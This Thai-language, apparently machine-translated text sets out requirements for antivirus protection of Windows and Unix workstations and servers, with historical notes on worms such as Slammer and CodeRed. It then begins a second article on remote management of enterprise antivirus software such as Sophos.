การตั้งค่าเหล่านี้ทำให้คุณสามารถกำหนดกลุ่มของคอมพิวเตอร์และโดเมนที่จะสแกนได้ การป้องกันไวรัสของเครือข่ายคอมพิวเตอร์ขององค์กร (สำนักงาน) การกำหนดค่าเซิร์ฟเวอร์ป้องกันไวรัส

จากเหตุผลและตัวอย่างข้างต้น เราสามารถกำหนดข้อกำหนดพื้นฐานสำหรับโปรแกรมป้องกันไวรัสสำหรับเวิร์กสเตชัน เป็นที่ชัดเจนว่าข้อกำหนดเหล่านี้จะแตกต่างกันไปสำหรับเวิร์กสเตชันของคลาสต่างๆ

ข้อกำหนดการป้องกันไวรัสสำหรับเวิร์กสเตชัน Windows

ก่อนหน้านี้ข้อกำหนดจะแบ่งออกเป็นหลายประเภท:

1. ข้อกำหนดทั่วไป- ความน่าเชื่อถือ ประสิทธิภาพ ใช้งานง่าย ต้นทุนต่ำ - ไม่มีจุดให้ทำซ้ำอีกครั้ง
2. ข้อกำหนดเบื้องต้น- อันเป็นผลมาจากงานหลัก:
   • ตรวจสอบไฟล์ทั้งหมดบนไดรฟ์ในเครื่องที่เข้าถึงได้ - สำหรับการอ่าน, การเขียน, สำหรับการเปิดตัว - เพื่อตรวจจับและต่อต้านไวรัสคอมพิวเตอร์
   • กำลังตรวจสอบไดรฟ์แบบถอดได้และเครือข่าย
   • เช็คความจำ
   • ตรวจหาไวรัสในข้อความขาเข้าและขาออก ทั้งข้อความเองและไฟล์แนบควรตรวจสอบด้วย
   • การตรวจสอบสคริปต์และองค์ประกอบที่ใช้งานอื่น ๆ ของหน้าเว็บ
   • การตรวจสอบมาโครในเอกสาร Microsoft Office และไฟล์แอปพลิเคชันอื่นๆ
   • การตรวจสอบไฟล์ผสม - ไฟล์เก็บถาวร, ไฟล์เก็บถาวรแบบขยายตัวเอง, ไฟล์ปฏิบัติการที่ทำแพ็กเกจ, ฐานข้อมูลเมล, ไฟล์รูปแบบเมล, คอนเทนเนอร์ OLE
   • ความเป็นไปได้ในการเลือกการกระทำต่างๆ เพื่อดำเนินการกับไฟล์ที่ติดไวรัส โดยค่าเริ่มต้น:
     • การปิดกั้น (เมื่อตรวจสอบตามเวลาจริง)
     • การบันทึก (เมื่อตรวจสอบตามต้องการ)
     • การกำจัด
     • ย้ายไปกักตัว
     • การรักษา
     • คำขอดำเนินการของผู้ใช้
   • การรักษาไฟล์ที่ติดไวรัส
   • การรักษาไฟล์ที่ติดไวรัสในอาร์ไคฟ์
   • เป็นที่ต้องการ - การตรวจหาโปรแกรมที่อาจไม่ต้องการ (แอดแวร์และสปายแวร์ เครื่องมือแฮ็ค ฯลฯ)
3. ข้อกำหนดการจัดการ
   • การแสดงตนของส่วนต่อประสานกราฟิกในพื้นที่
   • ความเป็นไปได้ของการจัดการระยะไกลและแบบรวมศูนย์ (เวอร์ชันองค์กร)
   • ความสามารถในการกำหนดเวลาการสแกนและอัปเดตงานที่จะเรียกใช้
   • ความสามารถในการทำงานใด ๆ หรือดำเนินการใด ๆ ตามความต้องการ (ด้วยตนเอง)
   • ความสามารถในการจำกัดการกระทำของผู้ใช้ที่ไม่ได้รับสิทธิพิเศษที่เกี่ยวข้องกับการป้องกันไวรัสที่ซับซ้อน
4. ปรับปรุงข้อกำหนด
   • รองรับแหล่งอัพเดทต่างๆ ในนาม:
     • ทรัพยากร HTTP หรือ FTP
     • โฟลเดอร์ในเครื่องหรือเครือข่าย
     • ระบบอัพเดตแบบรวมศูนย์ (ในเวอร์ชันองค์กร)
   • ความสามารถในการอัปเดตฐานข้อมูลต่อต้านไวรัส โปรแกรมป้องกันไวรัส และโมดูลแอปพลิเคชัน
   • ความสามารถในการอัปเดตด้วยตนเองตามต้องการหรือตามกำหนดเวลาโดยอัตโนมัติ
   • ความสามารถในการย้อนกลับการอัปเดตฐานข้อมูลต่อต้านไวรัส
5. ข้อกำหนดสำหรับการวินิจฉัย
   • การแจ้งเตือนผู้ใช้ในพื้นที่เกี่ยวกับเหตุการณ์สำคัญ - การตรวจหาไวรัส การเปลี่ยนแปลงสถานะการป้องกันไวรัส ฯลฯ
   • การเก็บบันทึกการป้องกันไวรัสและ / หรืองานส่วนบุคคล
   • การแจ้งผู้ดูแลระบบความปลอดภัยในการป้องกันไวรัส (ในเวอร์ชันองค์กร)

ข้อกำหนดการป้องกันไวรัสสำหรับเวิร์กสเตชัน Linux/Unix

1. ข้อกำหนดทั่วไป- ไม่เปลี่ยนแปลงในทางปฏิบัติ: ความน่าเชื่อถือ ประสิทธิภาพ ต้นทุนต่ำ ความสามารถในการใช้งานในระบบ Unix นั้นมักจะถูกประเมินตามเกณฑ์ที่แตกต่างกันเล็กน้อยเมื่อเทียบกับระบบ Windows แม้ว่าสถานะนี้จะค่อยๆ เปลี่ยนไปตามข้อกำหนดที่รวมกันเป็นหนึ่งเดียว
2. ข้อกำหนดเบื้องต้น- ตามจุดหมายปลายทาง:
   • การสแกนไฟล์และไดเร็กทอรีตามต้องการสำหรับไวรัส
   • เป็นที่ต้องการ แต่ไม่สำคัญ - ตรวจสอบไดเรกทอรีบางรายการในแบบเรียลไทม์เมื่อเข้าถึงไฟล์ หากจำเป็นต้องใช้ฟังก์ชันดังกล่าวจริงๆ แสดงว่าเวิร์กสเตชันไม่ใช่เซิร์ฟเวอร์มากนัก - ไม่มีความแตกต่างที่ชัดเจนระหว่างทั้งสองระบบในระบบ Unix
   • การตรวจหาไวรัสในอ็อบเจ็กต์คอมโพสิต - อาร์ไคฟ์, อาร์ไคฟ์แบบขยายตัวเอง, โมดูลปฏิบัติการที่ทำแพ็คเกจ, ฐานข้อมูลที่โพสต์, ไฟล์ฟอร์แมตเมล, คอนเทนเนอร์ OLE - ไม่จำกัดเฉพาะรูปแบบทั่วไปในสภาพแวดล้อม Unix
   • สามารถเลือกการดำเนินการที่จะดำเนินการเมื่อตรวจพบไฟล์ที่ติดไวรัส โดยค่าเริ่มต้น:
     • ลบ
     • ย้ายหรือเปลี่ยนชื่อ
     • รักษา
     • เขียนข้อมูลลงรายงาน
     • แจ้งให้ผู้ใช้ดำเนินการ (เมื่อตรวจสอบตามต้องการ)
   • การรักษาไฟล์ที่ติดไวรัส
   • เป็นที่ต้องการ - ความเป็นไปได้ของการรักษาในเอกสารสำคัญ
3. ข้อกำหนดการจัดการ
   • การจัดการภายในเครื่องโดยการแก้ไขไฟล์การกำหนดค่า
   • เด่นกว่า - การควบคุมระยะไกลผ่านเว็บอินเตอร์เฟส
   • ความสามารถในการกำหนดเวลางานเพื่อเรียกใช้และดำเนินการ
   • ความสามารถในการปฏิบัติงานและการดำเนินการด้วยตนเอง
4. ข้อกำหนดสำหรับการวินิจฉัย
   • เก็บบันทึกการทำงาน
   • การแจ้งเตือนผู้ดูแลระบบความปลอดภัยต่อต้านไวรัส

การป้องกันเซิร์ฟเวอร์

โดยทั่วไป การป้องกันไวรัสเซิร์ฟเวอร์ไม่แตกต่างจากการปกป้องเวิร์กสเตชัน เช่น จากการปกป้องเกตเวย์ ภัยคุกคามและเทคโนโลยีหลักในการตอบโต้ยังคงเหมือนเดิม - มีเพียงการเน้นย้ำเท่านั้นที่เปลี่ยนไป

เซิร์ฟเวอร์เครือข่าย เช่น เวิร์กสเตชัน แบ่งออกเป็นคลาสโดยธรรมชาติ ตามระบบปฏิบัติการที่ใช้:

• เซิร์ฟเวอร์ Windows
• เซิร์ฟเวอร์ Novell Netware
• เซิร์ฟเวอร์ยูนิกซ์

หลักการของการแบ่งเกิดจากลักษณะการคุกคามของไวรัสของระบบปฏิบัติการต่างๆ และด้วยเหตุนี้ ตัวเลือกต่างๆ ในการพิจารณางานหลักของโปรแกรมป้องกันไวรัส

ในกรณีของผลิตภัณฑ์ป้องกันเซิร์ฟเวอร์ ไม่มีการแบ่งผลิตภัณฑ์ส่วนบุคคลและผลิตภัณฑ์เครือข่าย - ผลิตภัณฑ์ทั้งหมดเป็นเครือข่าย (องค์กร) ผู้ผลิตหลายรายไม่แบ่งผลิตภัณฑ์ขององค์กรออกเป็นผลิตภัณฑ์เวิร์กสเตชันและเซิร์ฟเวอร์ไฟล์เลย - พวกเขามีผลิตภัณฑ์เดียว

ภัยคุกคามและมาตรการรับมือเฉพาะ

ภัยคุกคามเฉพาะเซิร์ฟเวอร์ทั้งหมดไม่เกี่ยวข้องกับคุณลักษณะของระบบปฏิบัติการเซิร์ฟเวอร์มากนัก แต่กับการใช้ซอฟต์แวร์ที่มีช่องโหว่เฉพาะสำหรับเซิร์ฟเวอร์

เซิร์ฟเวอร์ Microsoft Windows

สำหรับเซิร์ฟเวอร์ Windows ภัยคุกคามเดียวกันทั้งหมดมีความเกี่ยวข้องกับเวิร์กสเตชันภายใต้ Windows NT/2000/XP ความแตกต่างเป็นเพียงวิธีการเด่นของเซิร์ฟเวอร์ปฏิบัติการ ซึ่งแสดงออกมาในการโจมตีเพิ่มเติมจำนวนหนึ่งซึ่งไม่ปกติสำหรับเวิร์กสเตชัน

ดังนั้น ผู้ใช้แทบไม่ทำงานโดยตรงหลังเซิร์ฟเวอร์ Windows ซึ่งหมายความว่าโดยทั่วไปแล้วจะไม่ใช้ไคลเอนต์อีเมลและแอปพลิเคชัน office บนเซิร์ฟเวอร์ ด้วยเหตุนี้ ข้อกำหนดสำหรับการป้องกันจดหมายที่ระดับไคลเอนต์อีเมลและเครื่องมือตรวจจับไวรัสมาโครเพิ่มเติมในกรณีของเซิร์ฟเวอร์ Windows จึงมีความต้องการน้อยลง

ตัวอย่าง. Kaspersky Anti-Virus สำหรับ Windows File Servers ซึ่งแตกต่างจาก Kaspersky Anti-Virus สำหรับ Windows Workstations ตรงที่ไม่มีโมดูลสำหรับการวิเคราะห์พฤติกรรมของมาโครที่ทำงานเมื่อทำงานกับเอกสาร Microsoft Office และโมดูลสำหรับตรวจสอบอีเมลขาเข้าและขาออก นี่ไม่ได้หมายความว่าผลิตภัณฑ์ไม่มีการป้องกันไวรัสมาโครและเมลเวิร์ม - ดังที่ได้กล่าวไปแล้วในตอนท้ายไฟล์ที่เปิดทั้งหมดจะถูกตรวจสอบโดยโมดูลการป้องกันตามเวลาจริงของระบบไฟล์ - เพียงแต่ว่าไม่ต้องการข้อมูลเฉพาะของการทำงานของเซิร์ฟเวอร์ เครื่องมือป้องกันเพิ่มเติม เช่นเดียวกับกรณีของสถานีงาน

ในทางกลับกัน บริการต่างๆ เช่น Microsoft SQL Server และ Microsoft IIS สามารถใช้งานได้บ่อยบนเซิร์ฟเวอร์ Windows มากกว่าบนเวิร์กสเตชัน เช่นเดียวกับระบบปฏิบัติการที่ผลิตโดย Microsoft (และไม่ใช่เฉพาะ Microsoft) บริการเหล่านี้อาจมีช่องโหว่ ซึ่งผู้สร้างไวรัสมักใช้ช่องโหว่ซ้ำแล้วซ้ำเล่า

ตัวอย่าง. ในปี 2546 เวิร์ม NetWorm.Win32.Slammer ปรากฏขึ้นและกวาดไปทั่วอินเทอร์เน็ตโดยใช้ช่องโหว่ใน Microsoft SQL Server 2000 Slammer ไม่ได้บันทึกไฟล์ลงในดิสก์ แต่ทำงานโดยตรงในพื้นที่ที่อยู่ของแอปพลิเคชัน SQL Server หลังจากนั้น เวิร์มได้โจมตีที่อยู่ IP แบบสุ่มบนเครือข่ายในวงวนไม่รู้จบ โดยพยายามใช้ช่องโหว่เดียวกันนี้เพื่อเจาะ อันเป็นผลมาจากกิจกรรมของเวิร์ม เซิร์ฟเวอร์และช่องทางการสื่อสารทางอินเทอร์เน็ตมีการใช้งานมากเกินไปจนไม่สามารถใช้งานกลุ่มเครือข่ายทั้งหมดได้ เกาหลีใต้ได้รับผลกระทบอย่างหนักจากโรคระบาด เป็นที่น่าสังเกตว่าเวิร์มไม่ได้ดำเนินการอื่นใดยกเว้นการสืบพันธุ์

ตัวอย่าง. ก่อนหน้านี้ในปี 2544 ช่องโหว่ใน Microsoft IIS 5.0 ถูกโจมตีโดยเวิร์ม NetWorm.Win32 CodeRed.a. ผลที่ตามมาจากการแพร่ระบาดของโรคนั้นไม่น่าประทับใจเท่าในกรณีของหนอน Slammer แต่ในทางกลับกัน การใช้คอมพิวเตอร์ที่ติดเชื้อ CodeRed .a ความพยายามที่ไม่ประสบความสำเร็จทำให้ DDoS โจมตีทำเนียบขาวของสหรัฐฯ เว็บไซต์ (www.whitehouse.gov) CodeRed .a ยังไม่ได้บันทึกไฟล์บนเซิร์ฟเวอร์ที่ได้รับผลกระทบ

ลักษณะเฉพาะของเวิร์มทั้งสองคือโมดูลตรวจสอบระบบไฟล์ (ตามคำขอหรือเมื่อเข้าถึง) ไม่มีอำนาจกับพวกเขา เวิร์มเหล่านี้จะไม่บันทึกสำเนาของตัวเองลงในดิสก์ และโดยทั่วไปจะไม่แสดงสถานะของตนในระบบ แต่อย่างใด ยกเว้นสำหรับกิจกรรมเครือข่ายที่เพิ่มขึ้น ในปัจจุบัน คำแนะนำหลักสำหรับการป้องกันคือการติดตั้งแพตช์สำหรับระบบปฏิบัติการและซอฟต์แวร์ที่ใช้ในเวลาที่เหมาะสม อีกวิธีหนึ่งคือการกำหนดค่าไฟร์วอลล์เพื่อให้พอร์ตที่ใช้โดยบริการที่มีช่องโหว่ไม่สามารถเข้าถึงได้จากภายนอก - ข้อกำหนดที่สมเหตุสมผลในกรณีของการป้องกัน Slammer แต่ไม่เป็นที่ยอมรับสำหรับการป้องกัน CodeRed

เวิร์มที่โจมตีบริการของระบบปฏิบัติการที่มีช่องโหว่โดยตรง เช่น Lovesan, Sasser, Mytob เป็นต้น ยังคงมีความเกี่ยวข้องกับเซิร์ฟเวอร์ Windows การป้องกันควรมีมาตรการที่ครอบคลุม - การใช้ไฟร์วอลล์, การติดตั้งแพตช์, การใช้การตรวจสอบการเข้าถึง เวิร์ม หากโจมตีสำเร็จ ให้บันทึกไฟล์ไว้ในฮาร์ดไดรฟ์)

จากลักษณะของการโจมตี เราสามารถสรุปได้ว่าวิธีการหลักในการปกป้องเซิร์ฟเวอร์ Windows คือ: โมดูลการสแกนไฟล์ที่เข้าถึงได้ โมดูลการสแกนไฟล์ตามต้องการ โมดูลการตรวจสอบสคริปต์ และเทคโนโลยีหลักคือการวิเคราะห์ลายเซ็นและการวิเคราะห์พฤติกรรม (รวมถึงการวิเคราะห์พฤติกรรมในโมดูลการตรวจสอบสคริปต์)

เซิร์ฟเวอร์ Novell Netware

ไม่มีไวรัสเฉพาะที่สามารถติด Novell Netware ได้ จริงอยู่ มีโทรจันหลายตัวที่ขโมยสิทธิ์การเข้าถึงเซิร์ฟเวอร์ Novell แต่ยังคงได้รับการออกแบบให้ทำงานในสภาพแวดล้อมระบบปฏิบัติการ Windows

ดังนั้น โปรแกรมป้องกันไวรัสสำหรับเซิร์ฟเวอร์ Novell Netware ไม่ได้ออกแบบมาเพื่อปกป้องเซิร์ฟเวอร์นี้จริงๆ แล้วหน้าที่ของมันคืออะไร? เพื่อป้องกันการแพร่กระจายของไวรัส เซิร์ฟเวอร์ Novell Netware ส่วนใหญ่จะใช้เป็นไฟล์เซิร์ฟเวอร์ ผู้ใช้คอมพิวเตอร์ Windows สามารถจัดเก็บไฟล์ของตนบนเซิร์ฟเวอร์ดังกล่าวหรือเรียกใช้โปรแกรมที่อยู่ในโวลุ่ม Novell Netware เพื่อป้องกันไวรัสจากการเจาะทรัพยากรที่ใช้ร่วมกันของเซิร์ฟเวอร์ Novell หรือการเรียกใช้ / อ่านไวรัสจากทรัพยากรดังกล่าว จำเป็นต้องมีโปรแกรมป้องกันไวรัส

ดังนั้น เครื่องมือหลักที่ใช้ในแอนตี้ไวรัสสำหรับ Novell Netware คือการสแกนแบบเข้าถึงได้และแบบออนดีมานด์

สำหรับเทคโนโลยีเฉพาะที่ใช้ในโปรแกรมป้องกันไวรัสสำหรับ Novell Netware จำเป็นต้องสังเกตการบล็อกสถานีและ/หรือผู้ใช้ที่เขียนโปรแกรมที่เป็นอันตรายไปยังเซิร์ฟเวอร์

เซิร์ฟเวอร์ยูนิกซ์

สามารถพูดได้เช่นเดียวกันเกี่ยวกับเซิร์ฟเวอร์ Unix เช่นเดียวกับเซิร์ฟเวอร์ Novell Netware Antivirus สำหรับเซิร์ฟเวอร์ Unix ไม่ได้แก้ปัญหาในการปกป้องเซิร์ฟเวอร์จากการติดไวรัสมากนัก แต่เป็นงานในการป้องกันการแพร่กระจายของไวรัสผ่านเซิร์ฟเวอร์ ด้วยเหตุนี้จึงใช้เครื่องมือหลักสองอย่างเดียวกัน:

• ตรวจสอบไฟล์ตามความต้องการ
• กำลังตรวจสอบไฟล์ในการเข้าถึง

ตัวอย่าง. Kaspersky Anti-Virus สำหรับเซิร์ฟเวอร์ไฟล์ Unix/Linux มีโมดูลสแกนเมื่อเข้าถึงได้ ในขณะที่ Kaspersky Anti-Virus สำหรับ Linux Workstations ไม่มี นี่เป็นเพราะฟังก์ชันต่างๆ ของเวิร์กสเตชันและเซิร์ฟเวอร์ Linux - ในเครือข่ายที่สร้างขึ้นโดยเฉพาะ (หรือส่วนใหญ่) บนสถานี Linux แทบไม่มีความเสี่ยงที่จะติดไวรัส ดังนั้นจึงไม่มีความจำเป็นเร่งด่วนสำหรับโมดูลที่ควบคุมการทำงานของไฟล์ทั้งหมด . ในทางตรงกันข้าม หากคอมพิวเตอร์ลินุกซ์ถูกใช้อย่างแข็งขันในการจัดเก็บและถ่ายโอนไฟล์ (โดยเฉพาะบนเครือข่าย Windows) แท้จริงแล้วมันคือเซิร์ฟเวอร์และต้องมีการตรวจสอบไฟล์อย่างต่อเนื่อง

เวิร์ม Linux ที่รู้จักกันดีจำนวนมากใช้เพื่อกระจายช่องโหว่ที่ไม่ได้อยู่ในระบบปฏิบัติการ แต่ในระบบและซอฟต์แวร์แอปพลิเคชัน - ในเซิร์ฟเวอร์ wu-ftpd ftp ในเว็บเซิร์ฟเวอร์ Apache เป็นที่ชัดเจนว่าแอปพลิเคชันดังกล่าวถูกใช้บนเซิร์ฟเวอร์บ่อยกว่าบนเวิร์กสเตชัน ซึ่งเป็นข้อโต้แย้งเพิ่มเติมเพื่อสนับสนุนมาตรการที่ได้รับการปรับปรุงเพื่อปกป้องเซิร์ฟเวอร์

ไม่เหมือนกับเซิร์ฟเวอร์ Novell ซึ่งการรองรับเครือข่าย Microsoft เป็นคุณสมบัติในตัว เซิร์ฟเวอร์ Unix ไม่ได้รับการกำหนดค่าตามค่าเริ่มต้นสำหรับการถ่ายโอนไฟล์ SMB/CIFS เพื่อจุดประสงค์นี้ใช้แพ็คเกจซอฟต์แวร์พิเศษ - Samba ซึ่งช่วยให้คุณสามารถสร้างทรัพยากรที่ใช้ร่วมกันที่เข้ากันได้กับเครือข่าย Microsoft

หากไฟล์ถูกแลกเปลี่ยนผ่านโปรโตคอล SMB/CIFS เท่านั้น ย่อมไม่สมเหตุสมผลที่จะควบคุมการทำงานของไฟล์ทั้งหมด การตรวจสอบเฉพาะไฟล์ที่ถ่ายโอนโดยใช้เซิร์ฟเวอร์ Samba ก็เพียงพอแล้ว

ตัวอย่าง. กลุ่มผลิตภัณฑ์ของ Kaspersky Lab มีโซลูชันพิเศษ - Kaspersky Anti-Virus สำหรับ Samba Server ซึ่งได้รับการออกแบบมาโดยเฉพาะเพื่อปกป้องโฟลเดอร์ที่ใช้ร่วมกันที่สร้างบนเซิร์ฟเวอร์ Unix โดยใช้ซอฟต์แวร์ Samba ผลิตภัณฑ์นี้ไม่มีโมดูลที่ควบคุมการทำงานของไฟล์ แต่ใช้ตัวกรองที่สร้างขึ้นใน Samba และสกัดกั้นไฟล์ที่ส่งทั้งหมด

(C) Alexander Frolov, 2001
[ป้องกันอีเมล], http://www.frolov.pp.ru, http://www.datarecovery.ru

วัตถุประสงค์ของบทความนี้เพื่ออธิบายวิธีการที่ทันสมัยที่สุดในการจัดการและควบคุมระยะไกลในระบบต่อต้านไวรัสที่ออกแบบมาเพื่อใช้ในบริษัทขนาดกลางและขนาดใหญ่ที่มีเซิร์ฟเวอร์นับสิบและหลายร้อย รวมทั้งเวิร์กสเตชันหลายแสนเครื่อง มีการตรวจสอบเครื่องมือการจัดการและควบคุมระยะไกลสำหรับ Sophos, Norton AntiVirus, Mcafee NetShield, Trend Virus Control System และโปรแกรมป้องกันไวรัสอื่นๆ

1. ความจำเป็นในการจัดการและควบคุมระยะไกล

การจัดการและควบคุมโปรแกรมป้องกันไวรัสแบบรวมศูนย์จากระยะไกลสำหรับบริษัทขนาดกลางและขนาดใหญ่เป็นสิ่งจำเป็นสำหรับการปฏิบัติตามเทคโนโลยีป้องกันไวรัสทั่วทั้งเครือข่ายขององค์กร

การดำเนินการในโหมด "แมนนวล" เช่น การตรวจสอบการอัปเดตฐานข้อมูลต่อต้านไวรัสและโหลดโมดูลของโปรแกรมป้องกันไวรัส การตรวจสอบประสิทธิภาพของการตรวจจับไวรัสบนเวิร์กสเตชันและเซิร์ฟเวอร์ ฯลฯ จะไม่ได้ผลหากเครือข่ายมีจำนวนมาก ผู้ใช้หรือหากเครือข่ายประกอบด้วยส่วนต่างๆ ที่แยกตามภูมิศาสตร์

หากคุณไม่มั่นใจในการดำเนินการดังกล่าวอย่างทันท่วงทีและมีประสิทธิภาพ เทคโนโลยีการป้องกันไวรัสของเครือข่ายองค์กรจะถูกละเมิดอย่างแน่นอน ซึ่งจะนำไปสู่การติดไวรัสไม่ช้าก็เร็ว ตัวอย่างเช่น ผู้ใช้อาจกำหนดค่าการอัพเดทอัตโนมัติของฐานข้อมูลต่อต้านไวรัสไม่ถูกต้อง หรือเพียงแค่ปิดคอมพิวเตอร์ในขณะที่กำลังดำเนินการอัพเดท ด้วยเหตุนี้ ระบบจะไม่ทำการอัปเดตอัตโนมัติและอาจมีภัยคุกคามจากการติดไวรัสใหม่

เนื่องจากบริการของผู้ดูแลระบบที่ผ่านการรับรองมีราคาค่อนข้างแพง แม้แต่บริษัทขนาดใหญ่ก็มีพนักงานเพียงไม่กี่คนในพนักงาน หากไม่มีระบบพิเศษแบบรวมศูนย์สำหรับจัดการและตรวจสอบการทำงานของโปรแกรมป้องกันไวรัส จะไม่สามารถรับประกันการปฏิบัติตามเทคโนโลยีป้องกันไวรัสบนคอมพิวเตอร์หลายแสนเครื่องในเครือข่ายองค์กรได้

ในเวลาเดียวกัน ระบบควบคุมและจัดการจากระยะไกลสามารถอัปเดตฐานข้อมูลต่อต้านไวรัสและเปิดระบบป้องกันไวรัสบนคอมพิวเตอร์มากกว่า 1,000 เครื่องใน 10 นาที (ข้อมูลสำหรับโปรแกรมป้องกันไวรัสของ Sophos ให้ไว้ที่นี่)

อีกเหตุผลหนึ่งที่จำเป็นต้องมีระบบสำหรับการจัดการระยะไกลและการควบคุมโปรแกรมป้องกันไวรัสคือผู้ใช้ที่ "ขี้เกียจ"

ตามกฎแล้ว ผู้ใช้มีงานอย่างเต็มที่และไม่มีความต้องการหรือโอกาสที่จะถูกรบกวนจากการทำงานของระบบ โดยเฉพาะอย่างยิ่ง การติดตั้งและกำหนดค่าโปรแกรมป้องกันไวรัส เรียกใช้การสแกนหรืออัปเดตฐานข้อมูลโปรแกรมป้องกันไวรัสถือเป็นความรับผิดชอบของผู้ดูแลระบบหรือบริการทางเทคนิคอื่นๆ เชื่อว่าผู้ดูแลระบบกำลังทำงานของเขา ผู้ใช้มักจะเพิกเฉยต่อข้อกำหนดของคำแนะนำด้านความปลอดภัยในการป้องกันไวรัสหรือไม่ได้อ่านเลย

ภายใต้เงื่อนไขเหล่านี้ ระบบป้องกันไวรัสควรเป็นมิตรกับผู้ใช้ โดยดำเนินการที่จำเป็นทั้งหมดโดยอัตโนมัติและมองไม่เห็นสำหรับผู้ใช้ สิ่งนี้ไม่เพียงแต่ใช้ได้กับการสแกนไฟล์เท่านั้น แต่ยังรวมถึงฟังก์ชันต่างๆ เช่น การติดตั้ง การกำหนดค่า และการอัปเดตโปรแกรมป้องกันไวรัส

ในเวลาเดียวกัน ผู้ดูแลระบบจะต้องติดตั้งและอัปเดตซอฟต์แวร์ป้องกันไวรัสจากระยะไกล ตลอดจนตรวจสอบสถานะของการป้องกันไวรัสบนเวิร์กสเตชันและเซิร์ฟเวอร์เครือข่ายโดยใช้เวิร์กสเตชันสำหรับสิ่งนี้ หลักการนี้รองรับระบบป้องกันไวรัสขององค์กรที่ทันสมัยทั้งหมด

2. ฟังก์ชั่นการจัดการและควบคุมระยะไกล

ในส่วนนี้ เราจะทบทวนฟังก์ชั่นการจัดการและควบคุมระยะไกลที่ใช้งานในระบบต่อต้านไวรัสสมัยใหม่ นี่คือรายการของฟังก์ชันดังกล่าว:

• การติดตั้งและอัปเดตโปรแกรมป้องกันไวรัสจากระยะไกล
• การอัปเดตฐานข้อมูลต่อต้านไวรัสจากระยะไกล
• การสร้างและการคัดลอกไปยังเซิร์ฟเวอร์เครือข่ายของชุดการแจกจ่ายสำหรับการติดตั้งโปรแกรมป้องกันไวรัสแบบรวมศูนย์
• การกำหนดค่าระยะไกลของโปรแกรมป้องกันไวรัสที่ติดตั้งบนเวิร์กสเตชันและเซิร์ฟเวอร์
• การตรวจจับอัตโนมัติของเวิร์กสเตชันใหม่ที่เชื่อมต่อกับเครือข่ายองค์กร ตามด้วยการติดตั้งโปรแกรมป้องกันไวรัสบนสถานีเหล่านี้โดยอัตโนมัติ
• การจัดกำหนดการงานสำหรับการเปิดตัวในทันทีหรือล่าช้า (เช่น การอัพเดตโปรแกรม ฐานข้อมูลต่อต้านไวรัส การสแกนไฟล์ ฯลฯ) บนคอมพิวเตอร์เครือข่ายใดๆ
• การแสดงกระบวนการต่อต้านไวรัสแบบเรียลไทม์บนเวิร์กสเตชันและเซิร์ฟเวอร์เครือข่าย

มาพูดถึงเรื่องนี้ในรายละเอียดเพิ่มเติมกัน

การติดตั้งและอัปเดตโปรแกรมป้องกันไวรัสจากระยะไกล

การติดตั้งโปรแกรมป้องกันไวรัสด้วยตนเองมักจะประกอบด้วยการเรียกใช้โปรแกรมติดตั้งและแนะนำโดยวิซาร์ดการติดตั้งแบบโต้ตอบ ในกรณีนี้ ในกล่องโต้ตอบของวิซาร์ด คุณต้องเลือกโลคัลไดรฟ์และไดเร็กทอรีที่จะติดตั้งโปรแกรม รวมทั้งตั้งค่าพารามิเตอร์และโหมดการทำงานของโปรแกรม

ปัญหาผู้ใช้

แม้ว่าการดำเนินการนี้จะง่ายสำหรับเวิร์กสเตชัน แต่ในเครือข่ายองค์กรมักจะดำเนินการโดยผู้ดูแลระบบหรือเจ้าหน้าที่ด้านเทคนิค เนื่องจากผู้ใช้ส่วนใหญ่มีเพียงแค่แนวคิดที่คลุมเครือเกี่ยวกับเทคโนโลยีการป้องกันไวรัสหรือไม่มีความคิดเลย (และไม่จำเป็นต้องมี!) ผู้ดูแลระบบไม่ไว้วางใจให้ดำเนินการนี้ สำหรับการติดตั้งโปรแกรมป้องกันไวรัสบนเซิร์ฟเวอร์ ผู้ดูแลระบบจะทำได้เท่านั้น

ขาดระดับการเข้าถึงทรัพยากรระบบที่จำเป็น

หากเวิร์กสเตชันของผู้ใช้มีระบบปฏิบัติการ Microsoft Windows NT/2000 ติดตั้งอยู่ เมื่อตั้งค่านโยบายการเข้าถึงอย่างเหมาะสม โดยทั่วไปแล้วผู้ดูแลระบบที่ดีจะห้ามไม่ให้ผู้ใช้ติดตั้งโปรแกรมใดๆ ด้วยตนเอง นอกจากนี้ยังห้ามมิให้เชื่อมต่อกับโดเมนท้องถิ่นด้วยสิทธิ์ของผู้ดูแลระบบ ในกรณีนี้ ผู้ใช้ไม่มีความสามารถทางกายภาพในการติดตั้งและกำหนดค่าโปรแกรมป้องกันไวรัสด้วยตนเอง

ปัญหาสาขาที่ห่างไกลของบริษัท

ปัญหาอีกประการหนึ่งเกี่ยวกับการติดตั้งโปรแกรมป้องกันไวรัสแบบแมนนวลเกิดขึ้นในสาขาของบริษัทที่อยู่ห่างไกลซึ่งมักไม่มีผู้ดูแลระบบอยู่ในพนักงาน ผู้ดูแลระบบมาที่สาขาดังกล่าวเป็นครั้งคราวเมื่อมีความจำเป็น ในเวลาเดียวกัน พนักงานที่ทำงานในสาขาระยะไกลมักจะไม่มีสิทธิ์เข้าถึงทรัพยากรที่จำเป็นในการติดตั้งโปรแกรมป้องกันไวรัสบนเซิร์ฟเวอร์และเวิร์กสเตชันของเครือข่ายท้องถิ่นของสาขา

ลงทุนเวลามากเกินไป

แม้ว่าผู้ดูแลระบบหรือเจ้าหน้าที่ด้านเทคนิคสามารถข้ามเวิร์กสเตชันทั้งหมดในเครือข่ายองค์กรเพื่อติดตั้งโปรแกรมป้องกันไวรัสด้วยตนเอง แต่ก็อาจใช้เวลามากเกินไป เนื่องจากคอมพิวเตอร์หลายแสนเครื่องสามารถเชื่อมต่อกับเครือข่ายของบริษัทได้ นอกจากนี้ คอมพิวเตอร์จะได้รับการซ่อมแซม ซอฟต์แวร์ที่ติดตั้งจะถูกแทนที่ และการดำเนินการอื่นๆ ที่จำเป็นต้องติดตั้งโปรแกรมป้องกันไวรัสใหม่

การติดตั้งโปรแกรมป้องกันไวรัส Sophos อัตโนมัติจากระยะไกล

ดังนั้นระบบป้องกันไวรัสที่อ้างว่าใช้ในภาคธุรกิจของตลาดจะต้องอนุญาตให้ติดตั้งระยะไกลบนคอมพิวเตอร์ทุกเครื่องในเครือข่ายองค์กรจากเวิร์กสเตชันผู้ดูแลระบบเครื่องเดียว

